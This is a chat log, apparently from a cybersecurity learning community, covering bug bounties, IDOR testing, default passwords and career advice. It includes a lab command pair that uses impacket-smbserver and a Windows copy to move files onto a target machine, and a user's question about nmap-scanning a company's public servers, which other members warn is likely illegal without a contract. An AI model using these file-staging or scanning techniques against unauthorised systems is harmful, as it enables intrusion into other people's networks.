i check for idors on sensitive data/sensitive functions sometmies but that's about it --- otherwise I set up Autorize sometimes and let it just test for them automatically
dog
if you really need a chmod calculator, go back and study linux all over again π
Aye, and if a company is offering 10K for a bounty - Chances are they are confident that the low hanging stuff has bee picked
in my mind, idor is only a step above having the main password as Admin:admin
imagine i found an idor but i don't know what websocket means
Grammarly offer 100K if you get access to an unauthorised doc
Been like that for a couple years now iirc
Esqy, internet facing admin:admin happens still
oh yeah, the internet is a big place. But high value bounties, y'know
same with many password managers. i think 1password's big pot rn is like 2M or something dumb if you can access a particular vault
The brother of hodor.β’οΈ
Eyy Timt. been celebrating today?
more often than anybody care to admit π
my local qbit is admin:adminadmin
twice as many admins
National Clean Out Your Computer Day?
You were rooting for the niners, right?
admi is the masculine/mixed plural, admae is the feminine plural
^
Admi it is π
The niners lost. Maybe next year. π
Also: Hug Day.
Yup! Got a tiny rugby tackle-hug from myu neice when I was at my sisters house fixing her washing machine π
Hi people, so i saw SecOps internship post from the same company. I want to ask this question once again for SecOps
It was adorable. Then she helped me put the machine back together
old movie but great.
Brobot - Agreed. Even scarier when you keep remembering it was all true.
yeah, bronson is truly a prisons worst nightmare lol
Hello
G'd evnin' Zac Efron
Sent my CV, hope i can get the internship
YES HEAP! you got this, you are the best applicant. The others can just... Go back to searching
In fact, they may aswell cancel their applications now.
because You. Got. This.
I'm not that competent but i think my resume fits with the job description
You are that competent. Stop doubting yourself. Thers a time for being humble, but applying for an interneship is not that time.
π
And on that day, citizens will sing in the streets.
And, one of them is Esqy!
one day ill be a full -time bug bounty hunter

That's not a job though
god id rather be scraping dirt off the floor than be a full time bug bounty hunter lmao
i know π
I can support that, but it's a very steep curve to get there. The amount of time you'll need to spend learning and hunting... May aswell get a regular job
Yeah, but no matter what
oh the dreamm!! hunting for a bug that turns out to be worth a t-shirt and a sticker.. oh the dream..
Nothing wrong with a nice clean floor, brobot
Lmao
i don't want to work for a company π i want to be freee , thats why bug hunting is my favorite
Heap, You're gonna get there easy. I was talking about full-time bug bounty π
x))))
oh
x))))
yeah right
can always turn to contracting work once you've gathered the right experience and knowledge
They sometimes don't give you any bounty
working for a company has its perks. You can learn new stuff while being paid to do it
also the certs that the company will pay for
yup
So I'm stuff full of pizza... But still know I have room for an ice lolly. Do humans have a second 'dessert' stomach?
but i think you need at least a bachelor degree in order to apply for a company , what abt who love cyber security but haven't go to university but self taught?
Of course
certs
There's always a place for desserts
Shrug. Ther are people on here without degrees who have good pentesting jobs
you really dont need a bachelor degree, self teaching and getting a valuable cert can boost you
If you're self taught, that's better
Hey guys.
I made a share on my kali and now I use this command on target windows to access share but its not working:
copy \\10.10.15.54:4444\home\thm\aaa C:\
U have any idea why its not working?
On the other hand, if you CAN get a degree, the process of getting it will help you learn the right skills with experienced tutors and network with your future work/industry peers
imo, not worth the debt
Do you have write permissions to C:\?
shrug. I paid mine off this year.
debt?
student loans if you arent paying for the uni degree in full
or in a country where uni isnt free
Pay to be able to go to school?
I get paid to go to schoolπ
we are not the same
The problem is the network path was not found
This is the command I used to create the share:
sudo impacket-smbserver share -smb2support -port 4444 /home/thm
that's a strong statement from somebody call Singularity π
Why not just do it with an http server instead, if that does not work?
nice , remark π
I'm trying to learn how to use smb to transfer files
in network services room?
guys im so sad
same way as ftp but using smbclient on linux
wait for two week more
i spent an hour trying to figure out why firefox wasn't working and it was bc i had foxyproxy
lul
;-;
I do it a lot
Ivanti is being hammered by threat actors
I just finished counting for today
another day, another count π
Yeah
someone hack me some advil thx
sus
I don't have pills, I have wine and whisky π
whiskey is a good hangover cure but i need a people are annoying and i'm tired af cure
Whisky*
whisk(e)y

I got some in my bag
hello, just a question, why cant you access to real webs with their ip and only with its domain name?, is it blocked for not to use nmap or stuff like that? is there any way to use nmap for this kind of webs wirth restrictions?
Why do you need to nmap their IP?
I have scotch, so definitely whisky π
network audit
Uhm
Of course, it would be your pleasure π π
why would you do that
bro why are you judging me hahah it is just a question, the father of mny best friend has a company and my friend has aked my to try and pwn it
Im not judging
Also just asking a question :p
and do you know the answer of mine haha?
Did you sign a contract?
yes bro yes
I don't believe you
No, im not sure. You use nmap inside the network.
ok i dont care wtf
ok thank u!

You're aware that depending on your local laws you could end up with a criminal record from this, yes?
That often puts a bit of an end to a future career in the industry too, ftr
TL;DR: don't be flippant when you're doing something that's technically a breach of the law (and is allowable in very specific circumstances regulated by very strict legal documents)
Imagine not being able to use computers for the rest of your life before you turn 20
Depressing
yes, i didnt know all of the members of this group where judges, i was just asking a question, sorry for being in a court is my mistake to have asked that
I mean, unlikely to be a lifetime ban for a minor committing a minor cyber offence
either way is just a question
Yeah, it was just a hypothetical
Uh huh, try the sarcasm if you end up in front of an actual judge lmao
We are just warning you
Trust me, the "judgement" you're getting in here is in your best interests
^^
Don't screw around with this stuff
yeah yeah i know and i appreciate it but as i have told you is all in rule, im not doing anything eillegal
You could have a long career in cyber sec.
Or a short one.
I know which one I'd like.
if the short one means i don't have to work anymore.......
computers suck
Well, hosting services might want to know that you're conducting a test on their servers
So, in other words, you've got relevant credentials backing up your skillset, have a legally binding contract and liability disclaimer, signed and ratified by a lawyer, and have a full understanding of the work you've been tasked to undertake?
(is a direct violation of many CSP terms)
- relevant insurance
Yes, that too. + relevant insurance
Could be worse, you could work for Ivante.
ouch
thank you for your words i really appreciate it
And yet, you're still off to try it, aren't you?
On another note, I just finished day 3 of no nicotine
There being hit hard
i would talk to a lawyer for doing the pertinent papers and then try to understand it
Well, that's a good start!
yes but i still dont understand it haha , im not interested in tryng it, just to know if it is becasue of the firewall or something
